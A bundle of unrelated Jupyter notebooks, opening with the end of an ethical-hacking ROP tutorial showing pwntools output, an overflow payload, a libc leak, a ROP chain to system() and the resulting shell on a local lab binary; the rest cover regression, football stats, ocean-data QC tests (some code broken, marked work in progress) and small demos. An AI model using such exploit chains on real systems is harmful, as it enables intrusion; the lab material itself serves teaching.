# [DEBUG] PLT 0x25300 __libpthread_freeres
# [DEBUG] PLT 0x25308 malloc
# [DEBUG] PLT 0x25310 __libdl_freeres
# [DEBUG] PLT 0x25318 free
# [*] '/home/kali/EthicalHacking/ctf-demos/rop_basic/libc.so.6'
# Arch: amd64-64-little
# RELRO: Partial RELRO
# Stack: Canary found
# NX: NX enabled
# PIE: PIE enabled
# [DEBUG] Received 0x13 bytes:
# b'Give me some text:\n'
# [DEBUG] Sent 0x91 bytes:
# 00000000 61 61 61 61 62 61 61 61 63 61 61 61 64 61 61 61 │aaaa│baaa│caaa│daaa│
# 00000010 65 61 61 61 66 61 61 61 67 61 61 61 68 61 61 61 │eaaa│faaa│gaaa│haaa│
# 00000020 69 61 61 61 6a 61 61 61 6b 61 61 61 6c 61 61 61 │iaaa│jaaa│kaaa│laaa│
# 00000030 6d 61 61 61 6e 61 61 61 6f 61 61 61 70 61 61 61 │maaa│naaa│oaaa│paaa│
# 00000040 71 61 61 61 72 61 61 61 73 61 61 61 74 61 61 61 │qaaa│raaa│saaa│taaa│
# 00000050 75 61 61 61 76 61 61 61 77 61 61 61 78 61 61 61 │uaaa│vaaa│waaa│xaaa│
# 00000060 79 61 61 61 7a 61 61 62 62 61 61 62 63 61 61 62 │yaaa│zaab│baab│caab│
# 00000070 64 61 61 62 65 61 61 62 66 61 61 62 67 61 61 62 │daab│eaab│faab│gaab│
# 00000080 68 61 61 62 69 61 61 62 6a 61 61 62 1b 92 04 08 │haab│iaab│jaab│····│
# 00000090 0a │·│
# 00000091
# [DEBUG] Received 0xa4 bytes:
# 00000000 61 61 61 61 62 61 61 61 63 61 61 61 64 61 61 61 │aaaa│baaa│caaa│daaa│
# 00000010 65 61 61 61 66 61 61 61 67 61 61 61 68 61 61 61 │eaaa│faaa│gaaa│haaa│
# 00000020 69 61 61 61 6a 61 61 61 6b 61 61 61 6c 61 61 61 │iaaa│jaaa│kaaa│laaa│
# 00000030 6d 61 61 61 6e 61 61 61 6f 61 61 61 70 61 61 61 │maaa│naaa│oaaa│paaa│
# 00000040 71 61 61 61 72 61 61 61 73 61 61 61 74 61 61 61 │qaaa│raaa│saaa│taaa│
# 00000050 75 61 61 61 76 61 61 61 77 61 61 61 78 61 61 61 │uaaa│vaaa│waaa│xaaa│
# 00000060 79 61 61 61 7a 61 61 62 62 61 61 62 63 61 61 62 │yaaa│zaab│baab│caab│
# 00000070 64 61 61 62 65 61 61 62 66 61 61 62 67 61 61 62 │daab│eaab│faab│gaab│
# 00000080 68 61 61 62 69 61 61 62 6a 61 61 62 1b 92 04 08 │haab│iaab│jaab│····│
# 00000090 0a 47 69 76 65 20 6d 65 20 73 6f 6d 65 20 74 65 │·Giv│e me│ som│e te│
# 000000a0 78 74 3a 0a │xt:·│
# 000000a4
# [DEBUG] Sent 0x12 bytes:
# b'Do you read this?\n'
# [*] Switching to interactive mode
# Give me some text:
# [DEBUG] Received 0x12 bytes:
# b'Do you read this?\n'
# Do you read this?
# [*] Got EOF while reading in interactive
# ```
#
# - update payload and interactively send the payload to the vulnerable program locally first
# - the updated exploit code is exploit2.py
# - run the exploit code with LOCAL argument
#
# ```bash
# ┌──(kali㉿)-[~/EthicalHacking/ctf-demos/rop2]
# └─$ python exploit2.py LOCAL
# [*] '/home/kali/EthicalHacking/ctf-demos/rop2/vuln.exe'
# Arch: i386-32-little
# [*] '/home/kali/EthicalHacking/ctf-demos/rop2/vuln.exe'
# Arch: i386-32-little
# [*] '/home/kali/EthicalHacking/ctf-demos/rop2/vuln.exe'
# Arch: i386-32-little
# RELRO: Partial RELRO
# Stack: No canary found
# NX: NX enabled
# PIE: No PIE (0x8048000)
# [+] Starting local process '/home/kali/EthicalHacking/ctf-demos/rop2/vuln.exe': pid 36202
# [*] '/home/kali/EthicalHacking/ctf-demos/rop2/libc.so.6'
# Arch: i386-32-little
# RELRO: Partial RELRO
# Stack: Canary found
# NX: NX enabled
# PIE: PIE enabled
# [*] Loaded 10 cached gadgets for './vuln.exe'
# [*] Puts at address: 0xf7e38380
# [*] libc base address: 0xf7dc8000
# [*] Stage II ROP Chain:
# 0x0000: 0xf7e0cf60 0xf7e0cf60(0xf7f5433c)
# 0x0004: b'baaa' <return address> 0x0008: 0xf7f5433c arg0
# [*] Switching to interactive modeGive me some text:
# aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaab`\xcf\xe0\xf7baaa<C\xf5\xf7xploit.py Makefile vuln.c
# $ ls
# core exploit.py Makefile vuln.c
# exploit1.py libc.py pattern.txt vuln.exe
# exploit2.py libc.so.6 peda-session-vuln.exe.txt
# $ whoami
# kali
# ```
# ### Remote Exploit
#
# - run netcat-loop.sh program from one terminal
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/rop2]
# └─$ bash netcat-loop.sh
# listening on [any] 1234 ...
# ```
#
# - run the exploit2.py code from another terminal without any argument
#
# ```bash
# ┌──(kali㉿)-[~/EthicalHacking/ctf-demos/rop2]
# └─$ python exploit2.py
# [*] '/home/kali/EthicalHacking/ctf-demos/rop2/vuln.exe'
# Arch: i386-32-little
# RELRO: Partial RELRO
# Stack: No canary found
# NX: NX enabled
# PIE: No PIE (0x8048000)
# [+] Opening connection to localhost on port 1234: Done
# [*] '/home/kali/EthicalHacking/ctf-demos/rop2/libc.so.6'
# Arch: i386-32-little
# RELRO: Partial RELRO
# Stack: Canary found
# NX: NX enabled
# PIE: PIE enabled
# [*] Loaded 10 cached gadgets for './vuln.exe'
# [*] Puts at address: 0xf7e38380
# [*] Loaded 10 cached gadgets for './vuln.exe'
# [*] Puts at address: 0xf7e38380
# [*] libc base address: 0xf7dc8000
# [*] Stage II ROP Chain:
# 0x0000: 0xf7e0cf60 0xf7e0cf60(0xf7f5433c)
# 0x0004: b'baaa' <return address>
# 0x0008: 0xf7f5433c arg0
# [*] Switching to interactive modeGive me some text:
# aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaab`\xcf\xe0\xf7baaa<C\xf5\xf7
# $ ls
# core
# exploit1.py
# exploit2.py
# exploit.py
# libc.py
# libc.so.6
# Makefile
# netcat-loop.sh
# pattern.txt
# peda-session-vuln.exe.txt
# vuln.c
# vuln.exe
# $
# ```
#
# ## Exercise
# - Write Python exploit code with using pwntools to exploit ctf-demos/rop1/vuln.c program
|
ROP.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Info
#
# 2D example of vhgpr
import numpy as np
from sklearn.gaussian_process import GaussianProcessRegressor
from sklearn.gaussian_process.kernels import WhiteKernel, RBF, ConstantKernel as C
import matplotlib.pyplot as plt
from vhgpr import VHGPR
from fourbranches import f, mean, std
plt.rcParams.update({'font.size': 16})
# ### Data
np.random.seed(1)
DX = np.random.rand(600, 2) * 10 - 5
DY = f(DX)
# ### Model
kernelf = C(10.0, (1e-1, 1e2)) * RBF((5), (1e-1, 1e2))
kernelg = C(2, (1e-1, 1e1)) * RBF((2), (1e-1, 1e1))
model = VHGPR(kernelf, kernelg) # fit 5 times
model.fit(DX, DY)
# ### Prediction and plot
grid = 80
x = np.linspace(-5, 5, grid)
y = np.linspace(-5, 5, grid)
meshx, meshy = np.meshgrid(x,y)
# True values in grids
truefunc_mean = [[mean(np.array([[j,i]]))[0] for j in x]for i in y]
truefunc_std = [[std(np.array([[j,i]]))[0] for j in x]for i in y]
# Predictions in grids
meshsample = np.array([[[j,i] for j in x] for i in y])
predresults = model.predict(meshsample.reshape(grid**2, 2))
predfunc_mean = predresults[0].reshape(grid, grid)
predfunc_std = np.sqrt(np.exp(predresults[2].reshape(grid, grid)))
# +
plt.figure(figsize = (6,6))
axes1 = plt.contour(meshx, meshy, truefunc_mean, colors="Black")
axes2 = plt.contour(meshx, meshy, predfunc_mean, colors="Red")
plt.clabel(axes1)
plt.clabel(axes2)
plt.title('mean func')
lines = [ axes1.collections[0], axes2.collections[0]]
labels = ['True', 'Prediction']
plt.legend(lines, labels)
plt.show()
plt.figure(figsize = (6,6))
axes1 = plt.contour(meshx, meshy, truefunc_std, colors="Black")
axes2 = plt.contour(meshx, meshy, predfunc_std, colors="Red")
plt.scatter(DX[:,0], DX[:,1], s=6)
plt.clabel(axes1)
plt.clabel(axes2)
plt.title('std func')
lines = [ axes1.collections[0], axes2.collections[0]]
labels = ['True', 'Prediction']
plt.legend(lines, labels)
plt.show()
# -
|
example_2d.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import pandas as pd
pbp_data = pd.read_csv('data/pbp/2019.csv', sep=",", encoding='iso-8859-1')
pbp_data = pbp_data.append(pd.read_csv('data/pbp/2018.csv', sep=",", encoding='iso-8859-1'))
pbp_data = pbp_data.append(pd.read_csv('data/pbp/2017.csv', sep=",", encoding='iso-8859-1'))
pbp_data = pbp_data.append(pd.read_csv('data/pbp/2016.csv', sep=",", encoding='iso-8859-1'))
pbp_data.id.nunique()
# -
pbp_data.head()
non_garbage_time_data = pbp_data[
pbp_data.down != 0
]
non_garbage_time_data.id.nunique()
# +
# garbage_time_data = non_garbage_time_data[
# ((abs(non_garbage_time_data.offense_score - non_garbage_time_data.defense_score) >= 38) & (non_garbage_time_data.period == 2))
# | ((abs(non_garbage_time_data.offense_score - non_garbage_time_data.defense_score) >= 28) & (non_garbage_time_data.period == 3))
# | ((abs(non_garbage_time_data.offense_score - non_garbage_time_data.defense_score) >= 22) & (non_garbage_time_data.period == 4))
# ]
# print(non_garbage_time_data.id.nunique())
# print(garbage_time_data.id.nunique())
# non_garbage_time_data.drop(garbage_time_data.index, inplace=True)
# print(non_garbage_time_data.id.nunique())
# -
downs = [1, 2, 3, 4]
for d in downs:
intermed = non_garbage_time_data[
non_garbage_time_data.down == d
]
print(f"number of instances of down {d}: {intermed.id.nunique()} ({100 * intermed.id.nunique() / non_garbage_time_data.id.nunique()}%)")
drive_data = pd.read_csv('data/drives/2019.csv', sep=",", encoding='iso-8859-1')
drive_data = drive_data.append(pd.read_csv('data/drives/2018.csv', sep=",", encoding='iso-8859-1'))
drive_data = drive_data.append(pd.read_csv('data/drives/2017.csv', sep=",", encoding='iso-8859-1'))
drive_data = drive_data.append(pd.read_csv('data/drives/2016.csv', sep=",", encoding='iso-8859-1'))
drive_data.head()
# drive_data.drive_result.value_counts(normalize=True)
# cleaned_yards = drive_data.start_yardline.apply(lambda x: x % 50)
drive_data.start_yardline.value_counts(bins=[0,10,20,30,40,50])
# +
new_df = pd.merge(drive_data,
non_garbage_time_data[['drive_id','away','home']],
left_on='id',
right_on='drive_id')
new_df.loc[
new_df.offense == new_df.away, ['start_yardline']
] = 100 - new_df.start_yardline
new_df.loc[
new_df.offense == new_df.away, ['end_yardline']
] = 100 - new_df.end_yardline
new_df.head()
# +
# %matplotlib inline
import numpy as np
from matplotlib import colors
from matplotlib.ticker import PercentFormatter
import matplotlib.pyplot as plt
coll_df = new_df.drop_duplicates(subset='id')
coll_df.head()
fig, axs = plt.subplots(1, 2, sharey=False, tight_layout=True)
# We can set the number of bins with the `bins` kwarg
axs[0].hist(coll_df.start_yardline, bins=10)
# # We can also normalize our inputs by the total number of counts
axs[1].hist(coll_df.start_yardline, bins=10, density=True)
# # Now we format the y-axis to display percentage
axs[1].yaxis.set_major_formatter(PercentFormatter(xmax=1))
axs[0].set_xlabel('Starting yard line')
axs[0].set_ylabel('Frequency')
axs[1].set_xlabel('Starting yard line')
axs[1].set_ylabel('Density')
# -
coll_df.start_yardline.value_counts(bins=[0,10,20,30,40,50,60,70,80,90,100])
coll_df.drive_result.value_counts()
scoring_drives = coll_df[
(coll_df.drive_result == 'TD')
| (coll_df.drive_result == 'FG')
| (coll_df.drive_result == 'SF')
| (coll_df.drive_result == 'FUMBLE TD')
| (coll_df.drive_result == 'INT TD')
| (coll_df.drive_result == 'DOWNS TD')
]
scoring_drives.id.nunique()
cust_bins = np.linspace(1,100,100)
cust_bins
# +
# Probability of an offensive TD drive given starting yard line within one of these bins
def prob(prb1, prb2):
return prb1 / prb2
td = coll_df[
(coll_df.drive_result == 'TD')
].start_yardline.value_counts(bins=cust_bins)
td_vars = pd.DataFrame({'yardline_bin':td.index, 'td_frequency':td.values})
td_vars['td_density'] = td_vars.td_frequency / coll_df.id.nunique()
td_vars
# -
# Probability of an offensive FG drive given starting yard line within one of these bins
fg = coll_df[
(coll_df.drive_result == 'FG')
].start_yardline.value_counts(bins=cust_bins)
fg_vars = pd.DataFrame({'yardline_bin':fg.index, 'fg_frequency':fg.values})
fg_vars['fg_density'] = fg_vars.fg_frequency / coll_df.id.nunique()
fg_vars
def_scores = coll_df[
(coll_df.drive_result == 'FUMBLE TD')
| (coll_df.drive_result == 'INT TD')
| (coll_df.drive_result == 'DOWNS TD')
].start_yardline.value_counts(bins=cust_bins)
def_vars = pd.DataFrame({'yardline_bin':def_scores.index, 'def_frequency':def_scores.values})
def_vars['def_density'] = def_vars.def_frequency / coll_df.id.nunique()
def_vars
safety_scores = coll_df[
(coll_df.drive_result == 'SF')
].start_yardline.value_counts(bins=cust_bins)
sf_vars = pd.DataFrame({'yardline_bin':safety_scores.index, 'sf_frequency':safety_scores.values})
sf_vars['sf_density'] = sf_vars.sf_frequency / coll_df.id.nunique()
sf_vars
combined = pd.merge(td_vars, fg_vars, on='yardline_bin')
combined = pd.merge(combined, def_vars, on='yardline_bin')
combined = pd.merge(combined, sf_vars, on='yardline_bin')
combined
# combined now contains % of scoring AND position
# +
# generating prob of a specific yard line bin
pos = coll_df.start_yardline.value_counts(bins=cust_bins, normalize=True)
p_pos = pd.DataFrame({'yardline_bin':pos.index, 'yardline_density':pos.values})
p_pos
# -
combined = pd.merge(combined, p_pos, on='yardline_bin')
combined
combined["p_td_given_pos"] = combined.apply(lambda x: x.td_density/x.yardline_density, axis=1)
combined["p_fg_given_pos"] = combined.apply(lambda x: x['fg_density']/x['yardline_density'], axis=1)
combined["p_def_given_pos"] = combined.apply(lambda x: x['def_density']/x['yardline_density'], axis=1)
combined["p_sf_given_pos"] = combined.apply(lambda x: x['sf_density']/x['yardline_density'], axis=1)
combined.head()
# +
def translate(value, leftMin, leftMax, rightMin, rightMax):
# Figure out how 'wide' each range is
leftSpan = leftMax - leftMin
rightSpan = rightMax - rightMin
# Convert the left range into a 0-1 range (float)
valueScaled = float(value - leftMin) / float(leftSpan)
# Convert the 0-1 range into a value in the right range.
return rightMin + (valueScaled * rightSpan)
def yardline_weight(row):
return translate(row.yardline, 25, 100, 0, 1)
def weighted_epa(row):
return yardline_weight(row) * (7 * row.p_td_given_pos + 3 * row.p_fg_given_pos - 2 * row.p_sf_given_pos - 7 * row.p_def_given_pos)
combined['yardline'] = combined.yardline_bin.apply(lambda x: x.left)
combined['ep'] = combined.apply(lambda x: weighted_epa(x), axis=1)
combined
# -
f, ax = plt.subplots(figsize=(15,8))
combined.sort_values(by=["yardline"])
ax.scatter(combined.yardline, combined.ep);
ax.set_xlabel("Yard Line (0 = team endzone; 100 = opponent endzone)")
ax.set_ylabel("Expected Points");
# +
msk = np.random.rand(len(combined)) < 0.80
train_data = combined[msk]
test_data = combined[~msk]
train_data.head()
# -
# Linear Regression Model
from sklearn.linear_model import LinearRegression
model = LinearRegression()
model.fit(train_data.yardline[:, np.newaxis], train_data.ep)
xfit = np.linspace(0, len(train_data), len(train_data))
yfit = model.predict(xfit[:, np.newaxis])
print(f'Linear Regression: y = {model.coef_[0]:.5f}x + {model.intercept_:.5f}')
ax.plot(xfit, yfit, color='red', label='Linear Regression');
# +
# Polynomial Regression Model
from sklearn.preprocessing import PolynomialFeatures
from sklearn.metrics import mean_squared_error, mean_absolute_error, median_absolute_error
def poly_regress(degree, plot, color):
poly = PolynomialFeatures(degree=degree)
X_ = poly.fit_transform(train_data.yardline[:, np.newaxis])
X_test_ = poly.fit_transform(xfit[:, np.newaxis])
lg = LinearRegression()
# Fit
lg.fit(X_, train_data.ep)
# Obtain coefficients
# lg.coef_
quady_fit = lg.predict(X_test_)
ax.plot(xfit, quady_fit, color=color, label=f'Poly Regression (degree: {degree})')
print(f'Regression Coefficients: {lg.coef_}')
error = mean_absolute_error(train_data.ep[:, np.newaxis], quady_fit)
print(f'MAE: {error:.4f}')
return lg
quad1 = poly_regress(2, ax, 'g')
print(f'Polynomial Regression (with degree 2): y = {quad1.coef_[0]:.5f}x^3 + {quad1.coef_[1]:.5f}x^2 + {quad1.coef_[2]:.5f}x + {quad1.intercept_:.5f}')
quad2 = poly_regress(3, ax, 'b')
print(f'Polynomial Regression (with degree 3): y = {quad2.coef_[0]:.7f}x^4 + {quad2.coef_[1]:.7f}x^3 + {quad2.coef_[2]:.5f}x^2 + {quad2.coef_[3]:.7f}x + {quad2.intercept_:.7f}')
quad3 = poly_regress(4, ax, 'y')
print(f'Polynomial Regression (with degree 4): y = {quad3.coef_[0]:.7f}x^5 + {quad3.coef_[1]:.7f}x^4 + {quad3.coef_[2]:.7f}x^3 + {quad3.coef_[3]:.5f}x^2 + {quad3.coef_[4]:.7f}x + {quad3.intercept_:.7f}')
quad4 = poly_regress(5, ax, 'purple')
print(f'Polynomial Regression (with degree 5): y = {quad4.coef_[0]:.7f}x^6 + {quad4.coef_[1]:.7f}x^5 + {quad3.coef_[2]:.7f}x^4 + {quad4.coef_[3]:.7f}x^3 + {quad4.coef_[4]:.5f}x^2 + {quad4.coef_[5]:.7f}x + {quad4.intercept_:.7f}');
ax.legend(loc='upper right');
# +
# Testing
test_dataset = test_data.copy()
test_dataset['quad0_ep_prediction'] = model.predict(test_dataset.yardline[:, np.newaxis])
test_dataset['quad0_ep_prediction_error'] = median_absolute_error(test_dataset.ep[:, np.newaxis], test_dataset['quad0_ep_prediction'])
test_dataset['quad0_ep_prediction_error_pct'] = test_dataset.apply(lambda x: 100 * (x.quad0_ep_prediction_error / x.ep), axis=1)
# test_dataset.head()
yardline_quad1 = PolynomialFeatures(degree=2).fit_transform(test_dataset.yardline[:, np.newaxis])
test_dataset['quad1_ep_prediction'] = quad1.predict(yardline_quad1)
test_dataset['quad1_ep_prediction_error'] = median_absolute_error(test_dataset.ep[:, np.newaxis], test_dataset['quad1_ep_prediction'])
test_dataset['quad1_ep_prediction_error_pct'] = test_dataset.apply(lambda x: 100 * (x.quad1_ep_prediction_error / x.ep), axis=1)
# test_dataset.head()
yardline_quad2 = PolynomialFeatures(degree=3).fit_transform(test_dataset.yardline[:, np.newaxis])
test_dataset['quad2_ep_prediction'] = quad2.predict(yardline_quad2)
test_dataset['quad2_ep_prediction_error'] = median_absolute_error(test_dataset.ep[:, np.newaxis], test_dataset['quad2_ep_prediction'])
test_dataset['quad2_ep_prediction_error_pct'] = test_dataset.apply(lambda x: 100 * (x.quad2_ep_prediction_error / x.ep), axis=1)
# test_dataset.head()
yardline_quad3 = PolynomialFeatures(degree=4).fit_transform(test_dataset.yardline[:, np.newaxis])
test_dataset['quad3_ep_prediction'] = quad3.predict(yardline_quad3)
test_dataset['quad3_ep_prediction_error'] = median_absolute_error(test_dataset.ep[:, np.newaxis], test_dataset['quad3_ep_prediction'])
test_dataset['quad3_ep_prediction_error_pct'] = test_dataset.apply(lambda x: 100 * (x.quad3_ep_prediction_error / x.ep), axis=1)
# test_dataset.head()
yardline_quad4 = PolynomialFeatures(degree=5).fit_transform(test_dataset.yardline[:, np.newaxis])
test_dataset['quad4_ep_prediction'] = quad4.predict(yardline_quad4)
test_dataset['quad4_ep_prediction_error'] = median_absolute_error(test_dataset.ep[:, np.newaxis], test_dataset['quad4_ep_prediction'])
test_dataset['quad4_ep_prediction_error_pct'] = test_dataset.apply(lambda x: 100 * (x.quad4_ep_prediction_error / x.ep), axis=1)
test_dataset.head()
# -
validation_medians = pd.DataFrame(data={"strategy":["Linear","Degree2","Degree3","Degree4","Degree5"], "median_error":[test_dataset.quad0_ep_prediction_error_pct.median(),test_dataset.quad1_ep_prediction_error_pct.median(),test_dataset.quad2_ep_prediction_error_pct.median(),test_dataset.quad3_ep_prediction_error_pct.median(),test_dataset.quad4_ep_prediction_error_pct.median()]}, columns=["strategy","median_error"])
validation_medians
import numpy as np
generated_yardlines = np.linspace(0, 100, 101)
generated_yardlines
csv_dump_frame = pd.DataFrame({'yardline':generated_yardlines})
csv_yardline_quad2 = PolynomialFeatures(degree=3).fit_transform(csv_dump_frame.yardline[:, np.newaxis])
csv_dump_frame['ep'] = quad2.predict(csv_yardline_quad2)
csv_dump_frame.head()
csv_dump_frame.to_csv('results/ep.csv', index=False)
|
cfb-drive-pbp-analysis.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # [WIP] Creating New Tests
# How to implement a new QC test in CoTeDe?
# ### Objective:
# Show how to extend CoTeDe by creating new QC checks.
#
# CoTeDe contains a collection of checks to evaluate the quality of the data. The user can define the parameters for each test such as changing the acceptable threshold of the spike check, but sometimes it might be necessary a completely different procedure. CoTeDe was developed with the principle of a single engine where the modular checks can be plugged in. Here you will see how to create a new check.
import numpy as np
from bokeh.io import output_notebook, show
from bokeh.plotting import figure
output_notebook()
# Currently there are two main types of tests, QCCheck() and QCCheckVar().
#
# - QCCheck is a hard coded test and doesn't change according to the variable being evaluated. The criteria doesn't change independent of the variable being evaluated. For instance, the increasing pressure test defined by Argo will always check pressure, independent if the goal is to QC temperature, salinity, or chlorophyll.
#
# - QCCheckVar checks a given variable. The criteria is applied on the specific variable. For instance, although the spike test procedure is always the same, it is applied on the temperature values if the temperature
from cotede.qctests import QCCheck, QCCheckVar
# https://github.com/castelao/CoTeDe/blob/master/cotede/qctests/qctests.py
#
# Note that QCCheck() only requires the data object as input.
# Let's suppose that platforms 10 and 11 had bad sensors and any measurements from those should be flagged bad. Note that in this case it doesn't matter which variable we are evaluating, so let's create a new test based on cotede.qctests.QCCheck
#
# The first question is how is the platform identified in the data object? Let's suppose that this is available in the attributes of the data object, i.e. in data.attrs.
class GreyList(QCCheck):
def test(self):
"""Example test to identify measurements from known bad platforms
How to identify the platform in this data object? You need to tell. Let's suppose
that it is available at
>>> self.data.attrs["platform"]
"""
platform = self.data.attrs["platform"]
self.flags = {}
if platform in (10, 11):
flag = np.array(self.flag_bad, dtype="i1")
else:
flag = np.array(self.flag_good, dtype="i1")
# ### A test based on the measurements itself: Maximum Value
class MaximumValue(QCCheckVar):
def test(self):
assert ("threshold" in self.cfg), "Missing acceptable threshold"
threshold = self.cfg["threshold"]
feature = self.data[self.varname]
self.flags = {}
flag = np.zeros(np.shape(feature), dtype="i1")
flag[feature < minval] = self.flag_bad
flag[feature > maxval] = self.flag_bad
idx = (feature >= minval) & (feature <= maxval)
flag[np.nonzero(idx)] = self.flag_good
flag[ma.getmaskarray(feature) | ~np.isfinite(x)] = 9
self.flags["maximum_value"] = flag
# ### Spike test for chlorophyll - BGC Argo
#
# BGC Argo defines the spike test based on a running median, defined as
#
# RES = V2 - median(V0, V1, V2, V3, V4)
#
# bad if RES < 2 * percentile10(RES)
#
# Where percentile10 is the lowest 10% measurements for that profile
# +
def median_spike(x):
N = len(x)
lowpass = np.nan * np.ones(N)
for n in range(N - 4):
lowpass[n + 2] = np.median(x[n : n + 5])
delta[1:-1] = x[1:-1] - lowpass[1:-1]
return delta
class BGCChlSpike(QCCheckVar):
"""Spike test as recommended by the BGC Argo
"""
cfg = {"threshold": 2}
def set_features(self):
self.features = {
"spike_median": median_spike(self.data[self.varname]),
}
def test(self):
self.flags = {}
assert ("threshold" in self.cfg), "Missing acceptable threshold"
threshold = self.cfg["threshold"]
feature = np.atleast_1d(self.data[self.varname])
flag = np.zeros(feature.shape, dtype="i1")
flag[feature > threshold] = self.flag_bad
flag[feature <= threshold] = self.flag_good
x = self.data[self.varname]
flag[ma.getmaskarray(x) | ~np.isfinite(x)] = 9
self.flags["bgc_spike"] = flag
# +
try:
import pandas as pd
PANDAS_AVAILABLE = False
except:
PANDAS_AVAILABLE = True
def spike_median(x):
res = x - x.rolling(5, center=True).median()
return res / res.quantile(.1)
class BGCChlSpike(QCCheckVar):
"""Spike test as recommended by the BGC Argo
"""
cfg = {"threshold": 2}
def set_features(self):
self.features = {
"spike_median": spike_median(self.data[self.varname]),
}
def test(self):
self.flags = {}
assert ("threshold" in self.cfg), "Missing acceptable threshold"
threshold = self.cfg["threshold"]
feature = np.atleast_1d(self.data[self.varname])
flag = np.zeros(feature.shape, dtype="i1")
flag[feature > threshold] = self.flag_bad
flag[feature <= threshold] = self.flag_good
x = self.data[self.varname]
flag[ma.getmaskarray(x) | ~np.isfinite(x)] = 9
self.flags["bgc_spike"] = flag
|
docs/notebooks/creating_new_tests.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
#Modify the previous code so that the robot senses red twice.
p=[0.2, 0.2, 0.2, 0.2, 0.2]
world=['green', 'red', 'red', 'green', 'green']
measurements = ['red', 'red']
motions = [1,1]
pHit = 0.6
pMiss = 0.2
pExact = 0.8
pOvershoot = 0.1
pUndershoot = 0.1
def sense(p, Z):
q=[]
for i in range(len(p)):
hit = (Z == world[i])
q.append(p[i] * (hit * pHit + (1-hit) * pMiss))
s = sum(q)
for i in range(len(q)):
q[i] = q[i] / s
return q
def move(p, U):
q = []
for i in range(len(p)):
s = pExact * p[(i-U) % len(p)]
s = s + pOvershoot * p[(i-U-1) % len(p)]
s = s + pUndershoot * p[(i-U+1) % len(p)]
q.append(s)
return q
for k in range(len(measurements)):
p = sense(p, measurements[k])
p = move(p, motions[k])
print(p)
|
test_code/Q2_31_Sense_and_Move_2.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
from cartoframes.auth import Credentials
from cartoframes.client import SQLClient
# +
credentials = Credentials(username='cartovl', api_key='default_public')
sql = SQLClient(credentials)
# -
# ### Query
sql.query('SELECT adm0name, pop_max, the_geom FROM populated_places LIMIT 1')
sql.query('SELECT adm0name, pop_max, the_geom FROM populated_places LIMIT 1', verbose=True)
# ### Execute
# +
# sql.execute('SELECT * FROM populated_places')
# -
# ### Helpers
sql.distinct('populated_places', 'adm_0_cap_name')
sql.count('populated_places')
sql.bounds('SELECT * FROM populated_places WHERE adm0name = \'Spain\'')
sql.schema('populated_places')
sql.schema('populated_places', raw=True)
sql.describe('populated_places', 'adm0name')
sql.describe('populated_places', 'pop_max')
# +
# sql.create_table('test', [('id', 'INT'), ('name', 'TEXT')]) # cartodbfy=False
# sql.insert_table('test', ['id', 'name'], [0, 'a'])
# sql.update_table('test', 'name', 'b', 'id = 0')
# sql.rename_table('test', 'new_test')
# sql.drop_table('new_test')
|
examples/_debug/SQL_client.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import requests
import bs4
import time
import traceback
# +
#查询地址,从浏览器复制
url = 'http://www.bjguahao.gov.cn/dpt/appoint/133-200001351.htm?week=1&relType=0&sdFirstId=0&sdSecondId=0'
refresh_cd = 1 # 重试间隔 (秒)
sess = requests.Session()
cnt = 0
while True:
try:
rst = sess.get(url)
rst.encoding='utf-8'
rst_text = rst.text
soup = bs4.BeautifulSoup(rst_text, 'html.parser')
tds = soup.select('.ksorder_cen_l_t_c table tr:nth-of-type(2) td')
for td in tds:
status = td.text.strip()
date = td.select('input')[0].attrs['value'].split('_')[2]
if status is not None and status != '' and status != '约满':
break
if status is not None and status != '' and status != '约满':
print(status, date)
break
else:
cnt += 1
if cnt % 10 == 1:
print('retries:', cnt)
time.sleep(refresh_cd)
except KeyboardInterrupt:
break
except:
traceback.print_exc()
sess.close()
sess = requests.Session()
|
ChaHao.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: omnipotent (Python 3.6)
# language: python
# name: omnipotent
# ---
# # Jupyterlab testing
# +
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
import seaborn as sns
import analysis_utils
sns.set()
# +
# Load data.
data = analysis_utils.load_data()
# Task mapping
task_mapping = {
34: [70, 71],
35: [72, 73, 74],
36: [75, 76, 77],
37: [78, 79]
}
data.head(n=10)
# +
# Subset dataframes
task = 34
def success_plot(task, ax):
filters = (
(data["Subtask #"].isin(task_mapping[task]))
)
df = data[filters]
x = [
len(df[df["Eventual Success (# or N)"].isin(range(1,10))]),
len(df[df["Second Success (Y or N) "] == "Y"]),
len(df[df["First Success (Y or N) "] == "Y"]),
]
x = np.array(x)
x = x / x.sum()
y = np.array([0, 1, 2])
ax.barh(y, x, height=0.5, align='center')
ax.set_yticks([0, 1, 2])
ax.set_yticklabels(["Eventual success", "Second success", "First success"])
ax.set_title(f"Task #{task}")
ax.set_xlim([0, 1])
# +
fig, axes = plt.subplots(nrows=4, figsize=(6, 8), sharex=True)
